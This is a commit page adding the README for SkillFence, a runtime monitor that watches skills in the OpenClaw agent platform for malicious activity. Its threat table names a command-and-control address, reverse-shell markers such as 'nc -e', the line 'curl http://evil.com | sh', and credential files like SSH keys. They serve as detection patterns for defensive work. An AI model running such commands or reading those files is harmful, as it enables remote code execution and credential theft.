eva/openclaw
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Install skillfence via clawhub

Browse Source
This commit is contained in:
OpenClaw Assistant
2026-02-21 14:01:06 +00:00
commit d9fe3599d1
6 changed files with 1215 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

124
skills/skillfence/README.md Normal file
View File

@@ -0,0 +1,124 @@
# 🛡️ SkillFence — Runtime Skill Monitor for OpenClaw
**Watch what your skills actually do. Not what they claim to do.**
Scanners check code before install. SkillFence watches what code does after install. Network calls, file access, credential reads, process activity — all monitored and logged.
## The Problem
341 malicious skills were found on ClawHub (ClawHavoc campaign). Pre-install scanners caught them after the fact. But the Polymarket backdoor? It looked clean. The malicious `curl` was buried in a working market search function — it only triggered during normal use. No scanner would have caught it before it fired.
**Nobody is watching what skills do at runtime. SkillFence does.**
## What It Catches
| Threat | How | Example |
|--------|-----|---------|
| Known C2 servers | IP/domain matching | ClawHavoc's `54.91.154.110:13338` |
| Reverse shells | Process monitoring | `/dev/tcp` connections, `nc -e` |
| Crypto miners | Process monitoring | xmrig, cpuminer processes |
| curl\|sh attacks | Pattern matching | `curl http://evil.com \| sh` |
| Credential theft | File access monitoring | Reading `.env`, `openclaw.json`, SSH keys |
| Data exfiltration | Combined analysis | Network calls + sensitive file reads |
| Encoded payloads | Base64 detection | Obfuscated commands with decode ops |
## Install (30 seconds)
### Option 1: ClawHub (recommended)
```bash
clawhub install skillfence
```
### Option 2: Manual
```bash
cd ~/clawd/skills # or ~/.openclaw/skills
git clone https://github.com/deeqyaqub1-cmd/skillfence-openclaw skillfence
```
### Option 3: Copy-paste
Create `~/clawd/skills/skillfence/` and copy `SKILL.md` + `monitor.js` into it.
**No dependencies. No API keys. No config. Just Node.js.**
## Commands
```
/skillfence → Session status
/skillfence scan → Full system scan (skills + network + processes + credentials)
/skillfence scan <skill> → Scan a specific skill before installing
/skillfence watch → Quick runtime check
/skillfence log → View audit trail
```
## Full System Scan
Ask your OpenClaw: *"Run a security scan"*
SkillFence checks:
1. **All installed skills** — known C2 addresses, dangerous commands, credential access, data exfiltration patterns, encoded payloads
2. **Active network connections** — connections to known malicious servers, unusual ports on raw IPs
3. **Running processes** — reverse shells, crypto miners, remote code execution
4. **Sensitive file access** — recently accessed credentials, configs, keys, wallets
Results come with severity ratings:
- 🔴 **CRITICAL** — Known C2, active reverse shells, crypto miners. Act immediately.
- 🟠 **HIGH** — Data exfiltration, dangerous commands, credential access. Investigate now.
- 🟡 **MEDIUM** — Unusual connections, encoded payloads, recent credential reads. Review soon.
- 🟢 **CLEAN** — No issues found.
## Pre-Install Check
Before installing any new skill:
> "Check if the weather skill is safe"
SkillFence scans the skill's files and returns a verdict: DANGEROUS / SUSPICIOUS / REVIEW / CLEAN.
## Security
- **Read-only** — SkillFence monitors and reports. It never modifies, deletes, or executes anything. Credential checks only read file metadata (timestamps), never file contents.
- **No data leaves your machine** — all scanning happens locally. This skill never makes outbound network requests.
- **No API keys required** — works entirely offline
- **Open source** — read every line before you install
- **Audit trail** — every scan, alert, and block is logged with timestamps
## Honest Limitations
SkillFence runs as a skill at the same privilege level as other skills. This means:
- A sophisticated attacker could potentially detect and evade it
- Raw socket connections may bypass detection
- Novel attack techniques not in our pattern database won't be caught
- It's a **security camera, not a locked door**
But most attacks are unsophisticated. The entire ClawHavoc campaign used basic `curl`, `os.system`, and base64 chains. SkillFence catches all of that. Detection and deterrence beat zero monitoring.
## Pro ($9/mo)
Free tier includes all monitoring features, unlimited scans.
[SkillFence Pro](https://cascadeai.dev/skillfence) is a separate web dashboard that unlocks:
- 📊 Persistent threat dashboard across sessions
- 📧 Weekly security digest reports
- 🔧 Custom threat rules (add your own patterns)
- 🧩 Priority threat intelligence updates
**Pro features run on the CascadeAI web dashboard, not inside this skill.**
## Verify It Works
After installing, ask your OpenClaw:
> "Run a security scan on my skills"
If you see `🛡️ SkillFence | X skills scanned | 🟢 ALL CLEAR` — you're protected.
---
**Built for the OpenClaw community. Know what your skills are doing.**
[GitHub](https://github.com/deeqyaqub1-cmd/skillfence-openclaw) · [ClawHub](https://clawhub.com/deeqyaqub1-cmd/skillfence) · [Pro](https://cascadeai.dev/skillfence) · [Discord](https://discord.gg/cascadeai)